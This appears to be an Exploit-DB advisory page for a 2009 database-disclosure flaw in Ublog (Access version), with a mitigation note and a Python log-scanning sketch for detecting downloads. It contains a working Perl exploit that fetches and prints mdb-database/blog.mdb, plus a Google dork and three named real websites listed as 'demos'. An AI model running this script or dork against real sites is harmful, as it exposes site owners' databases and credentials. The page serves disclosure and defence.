Vendor: Ublog access version
By: Cyber-Zone (ABDELKHALEK)
CVSS: 7.5 (HIGH)
Vulnerability: Arbitrary Database Disclosure
CWE: 200
Product Name: Ublog access version
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Ublog access version Arbitrary Database Disclosure Exploit

Ublog access version Arbitrary Database Disclosure Exploit is a Perl script that exploits a vulnerability in the Ublog access version. It allows an attacker to download the mdb-database/blog.mdb file of a vulnerable website directly over HTTP. The attacker can use the dork http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N to search for vulnerable websites. The exploit loads the LWP::Simple and LWP::UserAgent modules, connects to the server and requests the file. If the file is found, its contents are displayed.

Mitigation:

The user should ensure that the mdb-database/blog.mdb file is not accessible to the public.
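
To check whether the database has already been fetched, the web server logs can be searched for successful requests to it. The following Python sketch is an added example, not part of the original advisory or exploit; it assumes IIS W3C extended logs, and the sample log lines, the `.accdb` extension and the `find_db_downloads` name are constructed for illustration.

```python
"""Flag successful downloads of Access database files in IIS W3C logs."""
from urllib.parse import unquote

DB_EXTENSIONS = (".mdb", ".accdb")  # .mdb is the page's case; .accdb is an assumption

# Constructed sample log (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status sc-bytes
2009-05-04 10:01:12 GET /index.asp archivio=OK 198.51.100.7 Mozilla/4.0 200 5120
2009-05-04 10:01:15 GET /mdb-database/blog.mdb - 198.51.100.7 libwww-perl/5.805 200 204800
2009-05-04 10:02:40 GET /MDB-Database/Blog%2Emdb - 203.0.113.9 Mozilla/4.0 200 204800
2009-05-04 10:03:02 GET /mdb-database/blog.mdb - 203.0.113.50 Mozilla/4.0 404 1245
"""


def find_db_downloads(log_text):
    """Return one dict per request that fetched a database file with a 2xx status."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order can change mid-file
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # Decode percent-escapes and fold case: IIS paths are case-insensitive.
        path = unquote(row.get("cs-uri-stem", "")).lower()
        status = row.get("sc-status", "")
        if path.endswith(DB_EXTENSIONS) and status.startswith("2"):
            size = row.get("sc-bytes", "")
            hits.append({
                "when": f"{row.get('date', '?')} {row.get('time', '?')}",
                "client": row.get("c-ip", "?"),
                "path": path,
                "agent": row.get("cs(User-Agent)", "?"),
                "bytes": int(size) if size.isdigit() else None,
            })
    return hits


if __name__ == "__main__":
    for hit in find_db_downloads(SAMPLE_LOG):
        print(hit)
```

Any hit means the database left the server, so credentials and other secrets stored in it should be treated as disclosed even after the file is moved out of the web root.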
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
#
# Ublog access version
# mdb-database/blog.mdb
# dork : http://www.google.co.ma/search?q=index.asp%3Farchivio%3DOK&hl=fr&start=20&sa=N
# demos :
# http://radiologyhunters.com/blog/mdb-database/blog.mdb
# http://foges.net/mdb-database/blog.mdb
# http://www.geoaurea.it/mdb-database/blog.mdb
#
#
use LWP::Simple;
use LWP::UserAgent;

print "\tUblog access version Arbitrary Database Disclosure Exploit\n";

print "\t****************************************************************\n";
print "\t*      Found And Exploited By : Cyber-Zone (ABDELKHALEK)       *\n";
print "\t*           E-mail : Paradis_des_fous[at]hotmail.fr            *\n";
print "\t*          Home : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM           *\n";
print "\t*               From : MoroccO Figuig/Oujda City               *\n";
print "\t****************************************************************\n\n\n\n";
if(@ARGV < 1)
{
&help; exit();
}
sub help()
{
print "[X] Usage : perl $0 site \n";
print "[X] Exemple : perl $0 www.site.com \n";
}
($site) = @ARGV;
print("Please Wait ! Connecting To The Server ......\n\n");
sleep(5);
$database = "mdb-database/blog.mdb";
my $exploit = "http://" . $site . "/" . $database;
print("Searching For file ...\n\n");
sleep(3);
$doexploit=get $exploit;
if($doexploit){
print("..........................File Contents...........................\n");
print("$doexploit\n");
print("..............................EOF.................................\n");
}
else {
help();
exit;
}

# milw0rm.com [2009-05-04]